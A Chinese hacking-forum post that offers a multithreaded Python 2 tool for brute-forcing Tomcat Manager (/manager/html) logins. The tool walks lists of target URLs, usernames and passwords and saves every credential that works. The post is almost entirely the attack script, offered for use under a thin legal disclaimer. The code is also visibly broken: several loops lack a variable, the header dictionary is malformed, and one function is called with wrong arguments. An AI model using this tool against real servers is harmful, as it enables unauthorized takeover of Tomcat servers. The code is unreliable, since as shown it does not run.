访问本站的所有人:

罂粟小组是国内最专业的黑客技术论坛,社会工程学,致力于网络安全技术研究和普及,秉承技术自由,技术创新,技术共享,技术进步的原则,为网络安全爱好者提供一个共同进步的平台,是你学习黑客技术的首选基地! 最后声明.本站只是为计算机爱好者提供一个学习网络技术的平台,从不参与黑客攻击等行为!

给我写信

WRITE TO ME

加入我们

JOIN US
简介

 

HanDs
NO.2

tomcat批量弱口令爆破工具(py版) 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import requests
import threading
import Queue
import time
import base64
import os
#headers = {'Content-Type': 'application/x-www-form-urlencoded','User-Agent': 'Googlebot/2.1 (+[url]http://www.googlebot.com/bot.html[/url])'}
u=Queue.Queue()
p=Queue.Queue()
n=Queue.Queue()
#def urllist()
urls=open('url.txt','r')
def urllist():
    for url in urls:
        url=url.rstrip()
        u.put(url)
def namelist():
    names=open('name.txt','r')
    for name in names:
        name=name.rstrip()
        n.put(name)
  
def passlist():
    passwds=open('pass.txt','r')
    for passwd in passwds:
        passwd=passwd.rstrip()
        p.put(passwd)
  
def weakpass(url):
    namelist()
    while not n.empty():
        name =n.get()
        #print name
        passlist()
        while not p.empty():
            good()
            #name = n.get()
            passwd = p.get()
            #print passwd
            headers = {'Authorization''Basic %s==' % (base64.b64encode(name+':'+passwd))}
            try:
                r =requests.get(url,headers=headers,timeout=3)
                #print r.status_code
                if r.status_code==200:
                    print '[turn] ' +url+' '+name+':'+passwd
                    f = open('good.txt','a+')
                    f.write(url+' '+name+':'+passwd+'\n')
                    f.close()
                else:
                    print '[false] ' + url+' '+name+':'+passwd
            except:
                print '[false] '  + url+' '+name+':'+passwd
  
def list():
    while u.empty():
        url = u.get()
        weakpass(name,url)
  
def thread():
    urllist()
    tsk=[]
    for in open('url.txt').read().split('\n'):
        i = i + '/manager/html'
        t = threading.Thread(target=weakpass,args=(i,))
        tsk.append(t)
    for in tsk:
        t.start()
        t.join(1)
        #print "current has %d threads" % (threading.activeCount() - 1)
def good():
    good_ = 0
    for in open('good.txt').read().split('\n'):
        good_+=1
    os.system('title "weakpass------good:%s"' % (good_))
  
if __name__=="__main__":
   # alllist()
    thread()


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
tomcat 批量弱口令爆破工具 ( py )
#1楼
发帖时间:2016-8-29   |   查看数:0   |   回复数:0
游客组